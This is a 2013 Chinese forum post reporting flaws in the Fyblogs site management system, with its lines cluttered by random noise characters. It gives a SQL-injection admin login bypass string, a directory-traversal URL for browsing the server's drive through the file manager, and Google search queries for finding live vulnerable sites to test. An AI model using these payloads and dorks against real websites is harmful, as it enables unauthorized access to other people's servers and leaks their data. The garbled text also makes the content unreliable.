漏洞类型: 未授权访问/权限绕过* n8 W! q( G3 J' f
% G9 w i; }; P" _! ]
简要描述:
: N# Y0 U7 b* D4 i- c. u: {! ? v4 k: ~( g. `" w
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!' I/ R+ j1 F6 m% ?! `: d7 Z
% `4 }* S2 z% m3 s3 Z详细说明:
: O, z" K$ f( Q5 Z8 _& y. V: h5 @, T- Y& y8 {# v" ?
后台万能密码 'or'='or'8 G, E) e; f1 @/ x" g x
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
5 Z3 ~0 t. b# U2 z# D4 H- Ladmin/uploadfile.asp?currentFolder=/upfiles/../& {% M% ^% C/ [* Z" |; L- Z, n
- x$ a: ~9 C5 o e# {- Y漏洞证明:
2 h! o5 A9 q9 q6 {$ R ?2 _) W
. U5 m. O: M1 ]# {谷歌:inurl:type.asp?id=1 新闻中心# M3 g& w k1 V S' `2 C0 l3 ?" _
或者 :inurl:download_ok.asp?: g+ d9 \! y, _4 k P, t [+ \
8 l) n. p1 ~7 x4 a" B6 ^! d# v; `可以测试2 ^$ N S& E) ]9 [- {# O
% s1 P3 f5 @! m4 O, t: i
5 G' ^3 B$ H: L' t, E) d7 I
|
发表于 2013-3-7 13:07:46
收藏
支持
反对